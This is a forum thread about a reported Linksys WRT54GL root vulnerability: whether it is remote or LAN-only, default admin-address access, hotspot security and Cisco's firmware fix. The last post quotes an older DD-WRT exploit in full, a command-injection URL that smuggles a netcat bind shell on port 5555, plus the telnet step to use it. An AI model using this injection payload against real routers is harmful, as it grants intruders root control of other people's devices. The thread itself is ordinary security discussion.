dslreports logo
site
 
    All Forums Hot Topics Gallery
spc

spacer




how-to block ads


Search Topic:
uniqs
3969
share rss forum feed


antdude
A Ninja Ant
Premium,VIP
join:2001-03-25
United State
kudos:5

Dangerous remote Linksys 0-day root exploit discovered

01:51PM »www.net-security.org/secworld.php?id=14234

Uh oh. I have that old router too!


stormbow
Freedom isn't FREE
Premium
join:2002-07-31
Simi Valley, CA
Which models though, all of them? It doesn't seem like the author has a clue that Linksys is a brand not a model.


Smokey Bear
veritas odium parit
Premium
join:2008-03-15
Annie's Pub
kudos:4

1 recommendation

reply to antdude
DefenseCode Security YouTube vulnerability demonstration:

»www.youtube.com/watch?v=cv-MbL7KFKE&hd=1

According to DefenseCode: "exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected."
--
»bit.ly/gUqYaH - C. Brian Smith: Think of the exclamation point as a car horn: a little goes a long way. Lay on it too hard and everyone’s going to think you’re a moron.


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:3

1 recommendation

I think Linksys routers are Linux or VxWorks based so the exploit might be general to the product line.
--
Don't feed trolls--it only makes them grow!

Mele20
Premium
join:2001-06-05
Hilo, HI
kudos:5
reply to antdude
That article said Linksy was issuing a fix...for that old of a Linksy router? I am surprised if that is true. I'm sure they won't be issuing a fix for my nine year old Linksy router which isn't even the last version of that router. The last version would be about eight years old.
--
When governments fear people, there is liberty. When the people fear the government, there is tyranny. Thomas Jefferson


kickass69

join:2002-06-03
Lake Hopatcong, NJ
reply to antdude
I have the WRT54GL as mentioned at the bottom of the article. But since I use DD-WRT I don't have to worry about that exploit it seems.


siljaline
I'm lovin' that double wide
Premium
join:2002-10-12
Montreal, QC
kudos:17
Reviews:
·Bell Sympatico

1 recommendation

reply to antdude
»blog.defensecode.com/2013/01/def···ing.html
quote:
Months ago, we've contacted Cisco about a remote preauth (root access) vulnerability in default installation of their Linksys routers that we've discovered.
We gave them detailed vulnerability description along with the PoC exploit for the vulnerability.

They said that this vulnerability was already fixed in latest firmware release...
Well, not this particular vulnerability, since the latest official Linksys firmware - 4.30.14, and all previous versions are still vulnerable.

Exploit shown in this video has been tested on Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected.
Cisco Linksys is a very popular router with more than 70,000,000 routers sold.
That's why we think that this vulnerability deserves attention.


trparky
Apple... YUM
Premium,MVM
join:2000-05-24
Cleveland, OH
kudos:2
Are any of the routers that are running third-party firmwares such as TomatoUSB-based firmwares vulnerable?


AVD
Respice, Adspice, Prospice
Premium
join:2003-02-06
Onion, NJ
kudos:1
reply to antdude
I can't see the YT, but what is the attack vector? If I have a linksys with a wpa encryption am I vulnerable?

Is the attack through the with an unassociated computer, someone on the lan or wlan or through the WAN port?
--
* seek help if having trouble coping
--Standard disclaimers apply.--


siljaline
I'm lovin' that double wide
Premium
join:2002-10-12
Montreal, QC
kudos:17
Reviews:
·Bell Sympatico
reply to trparky
said by trparky:

Are any of the routers that are running third-party firmwares such as TomatoUSB-based firmwares vulnerable?

Best bet would be to ask Cisco or see what's going on: »Cisco


NetFixer
Bah Humbug
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to antdude
said by antdude:

01:51PM »www.net-security.org/secworld.php?id=14234

Uh oh. I have that old router too!

As I said in my reply in the other thread on this same subject: »Re: Dangerous remote Linksys 0-day root exploit discovered!

said by [NetFixer :

What is being demonstrated in their video is not a remote exploit. Launching an application targeting 192.168.1.1 is not going to access a remote router.

Perhaps they have more that they are not showing in the video, but accessing a router from its LAN interface is not necessarily the same as accessing it from its WAN interface (which would be a requirement to be called a remote exploit). If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).


--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:3
Do these routers have a serial (RS-232) interface? Evidently using anything other than that is "remote access". I've always considered that to be from the WAN side as well. That's what most of us are worried about (and cascaded routers helps somewhat against that).
--
Don't feed trolls--it only makes them grow!


NetFixer
Bah Humbug
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
said by StuartMW:

Do these routers have a serial (RS-232) interface? Evidently using anything other than that is "remote access". I've always considered that to be from the WAN side as well. That's what most of us are worried about (and cascaded routers helps somewhat against that).

Many of the Linksys routers have an internal header that can be converted to a serial interface, but I have never run across a Linksys router (and make no mistake, it is Linksys routers that are being discussed, not real Cisco routers) that had an actual external serial interface from the factory (not even their business class routers have them). However even if the router(s) in question had serial ports, one would not be accessing a serial port via 192.168.1.1 as is shown in the POC video.
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:3

1 edit
Ahhh. I have a non big box store router (i.e. not a Linksys, Netgear etc) and it has a serial interface. I find that handy at times.

I do have "remote access" on the LAN side but only over HTTPS plus you need my personal certificate. Paranoid? You betchya

(You're not paranoid if they really are out to get you)
--
Don't feed trolls--it only makes them grow!


NetFixer
Bah Humbug
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage

1 recommendation

said by StuartMW:

Ahhh. I have a non big box store router (i.e. not a Linksys, Netgear etc) and it has a serial interface. I find that handy at times.

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface. I have complained to Cisco/Linksys about this vulnerability, but their reply was that it was a feature, not a vulnerability. This practice may not be universal for all Linksys routers, but I have found it to be so on many of them...my Cisco/Linksys/Vonage RTP300 seems to be an exception to that rule, but it uses Vonage firmware instead of Linksys firmware.
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:3

1 recommendation

said by NetFixer:

I have complained to Cisco/Linksys about this vulnerability, but their reply was that it was a feature, not a vulnerability.

Well as software engineers say "it's a feature not a bug"

I agree that just allows anyone on any subnet to get to the router. WTF?
--
Don't feed trolls--it only makes them grow!


AVD
Respice, Adspice, Prospice
Premium
join:2003-02-06
Onion, NJ
kudos:1
reply to NetFixer
said by NetFixer:

They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

is this true? If I have router A (192.168.1.xxx) plugged into router B (192.168.22.xxx) and I have a device with a browser on "B"'s lan and type 192.168.1.1 do I still get "B"s admin page? I can't say I've ever encountered this, and I've been in this environment many times.
--
* seek help if having trouble coping
--Standard disclaimers apply.--


AVD
Respice, Adspice, Prospice
Premium
join:2003-02-06
Onion, NJ
kudos:1
reply to NetFixer
said by NetFixer:

said by [NetFixer :

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree, think public access to a coffee shop or whatnot. A public user on the wlan should not be able to root the router. This is not the same a physical/software security.
--
* seek help if having trouble coping
--Standard disclaimers apply.--


StuartMW
Who Is John Galt?
Premium
join:2000-08-06
Galt's Gulch
kudos:3
said by AVD:

A public user on the wlan should not be able to root the router.

Valid point.

Devices on my WLAN or other subnets (than the one my PC's are in) cannot access my router.
--
Don't feed trolls--it only makes them grow!


EGeezer
zichrona livracha
Premium
join:2002-08-04
Midwest
kudos:8
Reviews:
·Callcentric
reply to NetFixer
said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.
--
Buckle Up. It makes it harder for the aliens to suck you out of your car.

ke4pym
Premium
join:2004-07-24
Charlotte, NC
reply to antdude
Hey, since Cisco is going to go back to fix this bug, maybe they can fix it so you can use modern browsers to access the administrator console!

Or would that be asking too much?

pandora
Premium
join:2001-06-01
Outland
kudos:2
Reviews:
·ooma
·Google Voice
·Comcast
·Future Nine Corp..
reply to Smokey Bear
The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video -

We're still investigating some tricks to exploit this vulnerability from the internet, but for now, yes - it seems safe from the outside of the network. Of course, unless services are available from the internet.

Regards,

Leon Juranic

CEO

DefenseCode



It isn't clear if this exploit affects Tomato, Tomato USB, DD-WRT or any other open source variant of Linux based routers.
--
"If you put the federal government in charge of the Sahara Desert, in 5 years there'd be a shortage of sand." - Milton Friedman"


NetFixer
Bah Humbug
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to AVD
said by AVD:

said by NetFixer:

said by [NetFixer :

If an intruder already has access to your LAN, it is not your network anymore (whether they get root access to your perimeter router or not).

I don't agree, think public access to a coffee shop or whatnot. A public user on the wlan should not be able to root the router. This is not the same a physical/software security.

And a properly setup public WiFi hotspot will not allow access by WiFi guests to the underlying infrastructure, or between WiFi clients. I have setup many such hotspots, and I used at least small business class routers and separate access points that can be setup to be secure. I have never setup a public WiFi hotspot using a residential grade WiFi router (although I have replaced those with proper equipment).

[sermon]Any business that operates a public WiFi hotspot without using the proper equipment that has been securely configured is just begging to be owned.[/sermon]
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.


BoToMaTiC

join:2003-10-29
Louisville, KY

1 recommendation

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en-us/supp···/WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.


antdude
A Ninja Ant
Premium,VIP
join:2001-03-25
United State
kudos:5
Reviews:
·Time Warner Cable
said by BoToMaTiC:

Cisco/Linksys just released new firmware for the WRT54GL, don't know about other routers.

»homesupport.cisco.com/en-us/supp···/WRT54GL

Firmware
01/10/2013

Firmware 4.30.16 (build 4)
- Resolves XSS issue.

XSS = Cross Site Scripting?
--
Ant @ AQFL.net and AntFarm.ma.cx. Please do not IM/e-mail me for technical support. Use this forum or better, »community.norton.com ! Disclaimer: The views expressed in this posting are mine, and do not necessarily reflect the views of my employer.


no__1__here
Premium
join:2003-10-13
Tomball, TX
reply to pandora
said by pandora:

The attack appears to be a LAN attack only at this time. This seems to involve busybox, and port 5555 with default 192.168.1.1. From the youtube link in the video

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.
--
COL 2:8

"Relativism just isn't true for me." - Hillary Putnam


NetFixer
Bah Humbug
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to EGeezer
said by EGeezer:

said by NetFixer:

Actually Cisco/Linksys uses the 192.168.1.1 LAN IP address accessibility as a pseudo replacement for a serial interface so that the device can be accessed easily if the user (or an intruder) doesn't know that router's LAN IP address. They do this by making the router respond to http requests on 192.168.1.1 no matter what IP address/subnet is actually assigned to that router's LAN interface.

In order for this to be exploited from a WAN side or wireless client, I'd think that remote administration and wireless HTTP and HTTPS would need to be enabled.

Yes, that (like the vulnerability this thread is about) is strictly a LAN side vulnerability, but an unnecessary one in my opinion. It just makes an XSS attack (which the vulnerability this thread is about seems to be) that much easier. Changing the default values for the LAN side of a residential/soho router has long been a sage security recommendation, and a deliberate bypassing of that measure by the manufacturer just does not seem like a wise move to me.
--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.

pandora
Premium
join:2001-06-01
Outland
kudos:2
Reviews:
·ooma
·Google Voice
·Comcast
·Future Nine Corp..

1 recommendation

reply to no__1__here
said by no__1__here:

I'm not sure I agree with that. The video shows them access busybox after gaining access to the router. And port 5555 seemed to me to just be the port opened by the previously successful exploit. Of course I could be mistaken. I don't think they actually show any detail as to how the exploit is done.

Cisco's patch is up for the WRT54GL, says it fixes issue with XSS (cross site scripting).
--
"If you put the federal government in charge of the Sahara Desert, in 5 years there'd be a shortage of sand." - Milton Friedman"


siljaline
I'm lovin' that double wide
Premium
join:2002-10-12
Montreal, QC
kudos:17
Reviews:
·Bell Sympatico

1 recommendation

reply to antdude
Unless already mentioned:
Linksys vuln: Cisco responds - Working on fix for WRT54GL router
»www.theregister.co.uk/2013/01/17···ys_vuln/


NetFixer
Bah Humbug
Premium
join:2004-06-24
The Boro
Reviews:
·Cingular Wireless
·Comcast Business..
·Vonage
reply to antdude
Could this "new" exploit just be a variation of an old (2009) Linksys/DD-WRT router vulnerability?

Amazing new exploit for Linksys routers running DD-WRT

The vulnerability enables one-liner ownership of DD-WRT boxes. For example, typing the following into your browser while within a hot spot served by a DD-WRT router will provide root shell access on port 5555:

http://cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

It looks a bit cryptic until you remove the $IFS’es, which are just there to insert spaces in the command:

http://routerIP/cgi-bin/;nc -l -p \5555 -e /bin/sh

With the spaces removed, you can see this is just a call to the venerable netcat (i.e. “nc”) command, which sets up a tiny server on port 5555 running the shell (/bin/sh). Once the shell service is thus initiated, you can log in using telnet and execute commands – note that the shell prompt is not displayed:

$ telnet routerIP 5555


--
A well-regulated militia, being necessary to the security of a free State, the right of the people to keep and bear arms shall not be infringed.

When governments fear people, there is liberty. When the people fear the government, there is tyranny.